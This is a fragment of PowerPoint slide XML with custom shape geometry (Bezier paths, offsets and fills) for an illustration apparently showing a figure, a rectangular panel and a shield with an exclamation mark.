                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46328" y="155"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46328" y="84"/>
                    <a:pt x="46257" y="1"/>
                    <a:pt x="4617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5" name="Google Shape;102;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2077361" y="2112969"/>
              <a:ext cx="72731" cy="100814"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1787" h="2477" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="894" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="0"/>
                    <a:pt x="1" y="548"/>
                    <a:pt x="1" y="1239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1917"/>
                    <a:pt x="406" y="2477"/>
                    <a:pt x="894" y="2477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="2477"/>
                    <a:pt x="1787" y="1917"/>
                    <a:pt x="1787" y="1239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1787" y="572"/>
                    <a:pt x="1382" y="12"/>
                    <a:pt x="894"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6" name="Google Shape;103;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2366168" y="2112969"/>
              <a:ext cx="72731" cy="100814"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1787" h="2477" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="894" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="0"/>
                    <a:pt x="1" y="548"/>
                    <a:pt x="1" y="1239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1917"/>
                    <a:pt x="406" y="2477"/>
                    <a:pt x="894" y="2477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="2477"/>
                    <a:pt x="1787" y="1917"/>
                    <a:pt x="1787" y="1239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1787" y="572"/>
                    <a:pt x="1382" y="12"/>
                    <a:pt x="894"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7" name="Google Shape;104;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929742" y="2140726"/>
              <a:ext cx="654537" cy="389499"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16082" h="9570" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="65" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="89" y="603"/>
                    <a:pt x="615" y="2759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1782" y="7605"/>
                    <a:pt x="7259" y="9570"/>
                    <a:pt x="8224" y="9570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9188" y="9570"/>
                    <a:pt x="10462" y="8724"/>
                    <a:pt x="13141" y="6557"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15820" y="4379"/>
                    <a:pt x="16082" y="735"/>
                    <a:pt x="16082" y="735"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16082" y="735"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15394" y="1695"/>
                    <a:pt x="13549" y="3294"/>
                    <a:pt x="11894" y="3294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11372" y="3294"/>
                    <a:pt x="10869" y="3135"/>
                    <a:pt x="10426" y="2747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9496" y="1926"/>
                    <a:pt x="9035" y="1527"/>
                    <a:pt x="8522" y="1527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8016" y="1527"/>
                    <a:pt x="7459" y="1914"/>
                    <a:pt x="6354" y="2664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5759" y="3071"/>
                    <a:pt x="5130" y="3239"/>
                    <a:pt x="4511" y="3239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2812" y="3239"/>
                    <a:pt x="1179" y="1982"/>
                    <a:pt x="473" y="961"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="473" y="961"/>
                    <a:pt x="146" y="1"/>
                    <a:pt x="6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8" name="Google Shape;105;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2004183" y="2745807"/>
              <a:ext cx="51404" cy="251567"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1263" h="6181" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2025"/>
                    <a:pt x="775" y="4097"/>
                    <a:pt x="1263" y="6180"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="387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9" name="Google Shape;106;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2428683" y="2748249"/>
              <a:ext cx="83394" cy="379446"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2049" h="9323" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2049" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1799" y="1489"/>
                    <a:pt x="775" y="2727"/>
                    <a:pt x="418" y="4251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6037"/>
                    <a:pt x="287" y="7561"/>
                    <a:pt x="656" y="9323"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="387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0" name="Google Shape;107;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2445166" y="3074374"/>
              <a:ext cx="10704" cy="53317"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="263" h="1310" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="263" y="1310"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="7450"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1" name="Google Shape;108;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1893723" y="1701334"/>
              <a:ext cx="707040" cy="741188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="17372" h="18211" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="9314" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8798" y="1"/>
                    <a:pt x="524" y="4459"/>
                    <a:pt x="524" y="4459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="4459"/>
                    <a:pt x="0" y="11793"/>
                    <a:pt x="96" y="12662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="13520"/>
                    <a:pt x="941" y="15936"/>
                    <a:pt x="941" y="15936"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4287" y="17949"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3441" y="15603"/>
                    <a:pt x="2441" y="7376"/>
                    <a:pt x="6144" y="6102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7364" y="5677"/>
                    <a:pt x="8416" y="5507"/>
                    <a:pt x="9321" y="5507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11179" y="5507"/>
                    <a:pt x="12415" y="6223"/>
                    <a:pt x="13216" y="6912"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14395" y="7924"/>
                    <a:pt x="13883" y="15817"/>
                    <a:pt x="12919" y="18211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16955" y="15044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17372" y="3887"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17372" y="3887"/>
                    <a:pt x="9537" y="185"/>
                    <a:pt x="9335" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9331" y="3"/>
                    <a:pt x="9324" y="1"/>
                    <a:pt x="931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2" name="Google Shape;109;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1790996" y="1390959"/>
              <a:ext cx="944973" cy="1381073"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="23218" h="33933" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="11514" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10180" y="0"/>
                    <a:pt x="1608" y="5453"/>
                    <a:pt x="786" y="12252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19050"/>
                    <a:pt x="1786" y="27492"/>
                    <a:pt x="4763" y="33933"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5775" y="33933"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5775" y="33933"/>
                    <a:pt x="4024" y="21324"/>
                    <a:pt x="4477" y="16240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4882" y="11525"/>
                    <a:pt x="9085" y="10704"/>
                    <a:pt x="11871" y="10704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14657" y="10704"/>
                    <a:pt x="17764" y="11525"/>
                    <a:pt x="18312" y="15538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18883" y="19741"/>
                    <a:pt x="16943" y="33576"/>
                    <a:pt x="16943" y="33576"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18967" y="33933"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21277" y="27396"/>
                    <a:pt x="23217" y="17752"/>
                    <a:pt x="22205" y="12156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21134" y="6263"/>
                    <a:pt x="12859" y="0"/>
                    <a:pt x="11514"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3" name="Google Shape;110;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="3226997"/>
              <a:ext cx="1885590" cy="1256083"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="30862" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="441" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="1" y="191"/>
                    <a:pt x="1" y="441"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="30421"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="30671"/>
                    <a:pt x="203" y="30862"/>
                    <a:pt x="441" y="30862"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45876" y="30862"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46138" y="30862"/>
                    <a:pt x="46328" y="30671"/>
                    <a:pt x="46328" y="30421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46328" y="441"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46328" y="191"/>
                    <a:pt x="46138" y="1"/>
                    <a:pt x="45876" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D1202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4" name="Google Shape;111;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1092220" y="3508638"/>
              <a:ext cx="330525" cy="521367"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8121" h="12810" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3652" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2300" y="0"/>
                    <a:pt x="1546" y="755"/>
                    <a:pt x="2001" y="2010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1882" y="2427"/>
                    <a:pt x="286" y="3380"/>
                    <a:pt x="1310" y="4404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1191" y="4701"/>
                    <a:pt x="0" y="5225"/>
                    <a:pt x="893" y="7035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="8095"/>
                    <a:pt x="691" y="8976"/>
                    <a:pt x="1691" y="9749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="10071"/>
                    <a:pt x="2501" y="10952"/>
                    <a:pt x="3679" y="11952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4287" y="12476"/>
                    <a:pt x="5144" y="12809"/>
                    <a:pt x="5144" y="12809"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5120" y="8785"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6489" y="8726"/>
                    <a:pt x="7299" y="8404"/>
                    <a:pt x="7501" y="7630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7501" y="6928"/>
                    <a:pt x="5703" y="6975"/>
                    <a:pt x="5739" y="6904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6192" y="6785"/>
                    <a:pt x="7561" y="6975"/>
                    <a:pt x="7906" y="5785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8120" y="4916"/>
                    <a:pt x="6037" y="4749"/>
                    <a:pt x="5263" y="4701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5261" y="4696"/>
                    <a:pt x="5270" y="4694"/>
                    <a:pt x="5290" y="4694"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5391" y="4694"/>
                    <a:pt x="5768" y="4752"/>
                    <a:pt x="6197" y="4752"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6667" y="4752"/>
                    <a:pt x="7199" y="4683"/>
                    <a:pt x="7501" y="4392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7918" y="3999"/>
                    <a:pt x="7906" y="3451"/>
                    <a:pt x="7608" y="3106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7311" y="2772"/>
                    <a:pt x="5322" y="2332"/>
                    <a:pt x="5287" y="2272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5600" y="2272"/>
                    <a:pt x="5914" y="2323"/>
                    <a:pt x="6163" y="2323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6367" y="2323"/>
                    <a:pt x="6528" y="2289"/>
                    <a:pt x="6608" y="2165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7251" y="1237"/>
                    <a:pt x="6037" y="498"/>
                    <a:pt x="5061" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4546" y="73"/>
                    <a:pt x="4071" y="0"/>
                    <a:pt x="3652"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5" name="Google Shape;112;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1215296" y="3585520"/>
              <a:ext cx="92104" cy="15629"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2263" h="384" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="146" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="1"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2263" y="383"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1737" y="33"/>
                    <a:pt x="557" y="1"/>
                    <a:pt x="146"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6" name="Google Shape;113;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1192993" y="3686821"/>
              <a:ext cx="138665" cy="15100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3407" h="371" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="225" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="0"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3406" y="371"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2582" y="32"/>
                    <a:pt x="844" y="0"/>
                    <a:pt x="225"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7" name="Google Shape;114;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1178951" y="3781610"/>
              <a:ext cx="146886" cy="8018"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3609" h="197" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1526" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="994" y="0"/>
                    <a:pt x="447" y="47"/>
                    <a:pt x="1" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3608" y="197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3608" y="189"/>
                    <a:pt x="2598" y="0"/>
                    <a:pt x="1526"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8" name="Google Shape;115;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1164910" y="3863742"/>
              <a:ext cx="135734" cy="15873"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="390" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="1606" y="389"/>
                    <a:pt x="3007" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3118" y="389"/>
                    <a:pt x="3227" y="387"/>
                    <a:pt x="3334" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3334" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0"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9" name="Google Shape;116;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2600721" y="4533413"/>
              <a:ext cx="364428" cy="137485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8954" h="3378" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="1874"/>
                    <a:pt x="2565" y="3377"/>
                    <a:pt x="4873" y="3377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6249" y="3377"/>
                    <a:pt x="7705" y="2844"/>
                    <a:pt x="8954" y="1537"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7644" y="1"/>
                  </a:ln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0" name="Google Shape;117;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2649683" y="4533413"/>
              <a:ext cx="474928" cy="92877"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11669" h="2282" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="429" y="1084"/>
                    <a:pt x="1834" y="1287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1834" y="1287"/>
                    <a:pt x="2152" y="2282"/>
                    <a:pt x="5073" y="2282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5299" y="2282"/>
                    <a:pt x="5540" y="2276"/>
                    <a:pt x="5798" y="2263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7549" y="2180"/>
                    <a:pt x="7977" y="2096"/>
                    <a:pt x="9180" y="1442"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11668" y="1132"/>
                    <a:pt x="11001" y="1"/>
                    <a:pt x="11001" y="1"/>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1" name="Google Shape;118;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2043946" y="2952235"/>
              <a:ext cx="11640" cy="45625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="286" h="1121" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="286" y="1120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="7450"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2" name="Google Shape;119;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1964459" y="3547873"/>
              <a:ext cx="589784" cy="661416"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="14491" h="16251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7267" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7222" y="0"/>
                    <a:pt x="7177" y="12"/>
                    <a:pt x="7132" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4947" y="1375"/>
                    <a:pt x="2774" y="1583"/>
                    <a:pt x="1592" y="1583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1557" y="1583"/>
                    <a:pt x="1522" y="1583"/>
                    <a:pt x="1489" y="1582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="1558"/>
                    <a:pt x="524" y="1499"/>
                    <a:pt x="524" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1496"/>
                    <a:pt x="491" y="1495"/>
                    <a:pt x="474" y="1495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420" y="1495"/>
                    <a:pt x="368" y="1510"/>
                    <a:pt x="322" y="1546"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="1594"/>
                    <a:pt x="227" y="1666"/>
                    <a:pt x="227" y="1725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="1773"/>
                    <a:pt x="1" y="6535"/>
                    <a:pt x="2680" y="11417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3513" y="12953"/>
                    <a:pt x="4846" y="14429"/>
                    <a:pt x="6942" y="16191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6990" y="16239"/>
                    <a:pt x="7049" y="16251"/>
                    <a:pt x="7109" y="16251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7168" y="16251"/>
                    <a:pt x="7204" y="16239"/>
                    <a:pt x="7263" y="16191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9276" y="14679"/>
                    <a:pt x="10692" y="13203"/>
                    <a:pt x="11585" y="11702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14431" y="6940"/>
                    <a:pt x="14491" y="2058"/>
                    <a:pt x="14491" y="1999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14491" y="1927"/>
                    <a:pt x="14455" y="1844"/>
                    <a:pt x="14395" y="1808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14349" y="1771"/>
                    <a:pt x="14302" y="1741"/>
                    <a:pt x="14250" y="1741"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14236" y="1741"/>
                    <a:pt x="14220" y="1744"/>
                    <a:pt x="14205" y="1749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14205" y="1749"/>
                    <a:pt x="13776" y="1785"/>
                    <a:pt x="13121" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11871" y="1773"/>
                    <a:pt x="9454" y="1511"/>
                    <a:pt x="7418" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7368" y="15"/>
                    <a:pt x="7318" y="0"/>
                    <a:pt x="726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3" name="Google Shape;120;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2223718" y="3729027"/>
              <a:ext cx="79528" cy="306797"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1954" h="7538" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="120" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905" y="1"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1001" y="5585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="5585"/>
                    <a:pt x="0" y="6025"/>
                    <a:pt x="0" y="6537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7078"/>
                    <a:pt x="430" y="7537"/>
                    <a:pt x="980" y="7537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="987" y="7537"/>
                    <a:pt x="994" y="7537"/>
                    <a:pt x="1001" y="7537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1524" y="7537"/>
                    <a:pt x="1953" y="7085"/>
                    <a:pt x="1953" y="6537"/>
